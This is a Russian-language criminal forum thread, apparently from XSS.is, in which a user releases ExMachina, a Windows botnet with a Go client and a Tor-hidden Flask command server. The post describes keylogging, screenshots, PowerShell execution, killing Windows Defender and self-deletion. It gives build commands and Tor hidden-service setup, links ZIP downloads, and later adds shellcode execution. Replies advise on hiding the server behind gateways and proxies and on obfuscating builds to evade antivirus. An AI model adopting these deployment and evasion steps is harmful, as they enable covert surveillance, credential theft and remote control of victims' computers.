• XSS.stack #1 – первый литературный журнал от юзеров форума

malware ExMachina - Ботнет для Windows

voldemort

(L3) cache
Пользователь
Регистрация
27.07.2023
Сообщения
289
Реакции
253
Гарант сделки
1
Привет, друзья, представляем ExMachina — ботнет для Windows, Клиент написан на языке программирования Golang, а сервер управления выполнен на языке Python с использованием веб-фреймворка Flask. , который использует сеть Tor для связи с ботами.
mechanism.png


Функции:
- Анонимный C2C-сервер благодаря сети Tor
- Прослушивание ввода с клавиатуры пользователя
- съемка скриншотов
- Запуск команд PowerShell
- попробуйте убить процессы защитника Windows
Screenshot at 2024-01-28 18-50-45.png


Screenshot at 2024-01-28 18-50-07.png


1.png

Отмечает, что этот проект еще не завершен, так как требуется дополнительное тестирование для обхода всех существующих антивирусов, поэтому список дел - это улучшение кода, чтобы он обходил все возможные антивирусы, и добавление функции для запуска зашифрованного шелл-кода.
for the hardware you need a server for at least 4GB of ram and 2cpu cores, as for the software: Tor, nginx(optional), python, and Go
использовать:
настроить скрытый сервер tor
закодируйте весь адрес onionv3, веб-перехватчик Discord и имя исполняемого файла, потому что он попытается самостоятельно удалить
отредактируйте main.go, добавив новые данные в кодировке Base64
Bash:
cd ExMachina
GOOS=windows go build -ldflags="-w -s -H=windowsgui"
выходной исполняемый файл составляет около 6,5 МБ
запустите сервер, запустив python wsgi.py(for debuging and testing python test.py), зарегистрируйте администратора (по умолчанию имя пользователя администратора — «ErenYeager», вы можете изменить его, если хотите) перейдите по маршруту /register и зарегистрируйте пароль администратора
наслаждаться
 

Вложения

  • ExMachina.zip
    117.5 КБ · Просмотры: 192
Последнее редактирование:
можно использовать публичные тор гейтвеи (onion.ly, onion.foundation), тогда не придется подтягивать клиент. также можно использовать их в связке с прокси: бот -> прокси -> гейтвей -> hidden service, а то будет жесткий фрод ав. также можно реализовать дополнительный слой шифрования между клиентом (ботом) и сервером, поверх ssl, т.к. трафик может прослушиваться самим гейтвеем. дискорд в помойку сразу
 
Пожалуйста, обратите внимание, что пользователь заблокирован
написанный на Go
Кстати, для всех, кто собирает голанг под Венду, обратите внимание, что последняя версия компилятора официально поддерживает только Windows 10 и выше. Есть некоторая вероятность, что собранный исполняемый файл будет нормально работать на более старых системах, но таки рантайм слишком жирный, чтобы быть уверенным, что ничего не отвалиться на старых системах. Поэтому, если нужна поддержка старых систем, то, наверное, стоит брать более раннюю версию компилятора.
 
Билд написан на golang? Я все верно понял?
Да, клиент с использованием Golang, а сервер с использованием Python.
 
можно использовать публичные тор гейтвеи (onion.ly, onion.foundation), тогда не придется подтягивать клиент. также можно использовать их в связке с прокси: бот -> прокси -> гейтвей -> hidden service, а то будет жесткий фрод ав. также можно реализовать дополнительный слой шифрования между клиентом (ботом) и сервером, поверх ssl, т.к. трафик может прослушиваться самим гейтвеем. дискорд в помойку сразу
Спасибо, брат. Я рассмотрю твои предложения для следующей версии в ближайшее время.
 
А как можно морфить или криптовать билд?
Что ты имеешь в виду под шифрованием морфить? Я не совсем понял, брат.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Друже, чуть вычитать и подредачить текст, ошибки в глаза бьются, а все остальное на высоком уровне!
 
Друже, чуть вычитать и подредачить текст, ошибки в глаза бьются, а все остальное на высоком уровне!
мне нужно немного подучить русский
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Виде изменение кода для снижения обнаружения анти вирусным по
Не особо лучший ты помощник в русском) без обид)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
мне нужно немного подучить русский
Пиши в личные сообщения, если нужна будет помощь. Всегда рад буду помочь.
 
Виде изменение кода для снижения обнаружения анти вирусным по
Ах, хорошо, проект нуждается в некоторых улучшениях, чтобы достичь этого. У меня нет опыта в обходе антивирусов, но это может помочь.
https://github.com/burrowers/garble
 
Исправление некоторых ошибок, все еще есть ошибка с клавиатурным вводом, я исправлю их позже.
Для участника, который спросил меня, как получить адрес onionv3, выполните этот сценарий Bash в вашем терминале.
Удалите комментарии из скрытой папки с хэштегами."
Bash:
sudo vim /etc/tor/torrc
Bash:
chmod -R 700 /var/lib/tor
systemctl enable tor
start tor with
systemctl start tor
systemctl restart tor
Теперь вы можете получить адрес, введя"
Bash:
cat /var/lib/tor/hidden_service/hostname
Извините за баги, братья.
 

Вложения

  • ExMachina.zip
    324.9 КБ · Просмотры: 26
Обновление, исправляющее небольшие ошибки и добавляющее возможность выполнения шелл-кодов.
 

Вложения

  • ExMachina.zip
    326.3 КБ · Просмотры: 47
Дискорд, мама мия 😿
Я удалил его из соображений конфиденциальности.
Теперь он попадет прямо в базу данных сервера.
 
Я чувствую интерес к вашему выбору технологий, описанных вами, особенно к тому, почему вы выбрали использовать Python в качестве языка для сервера управления, а не такой же Golang, как в клиентской части? Есть ли какие-то конкретные причины или соображения?
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх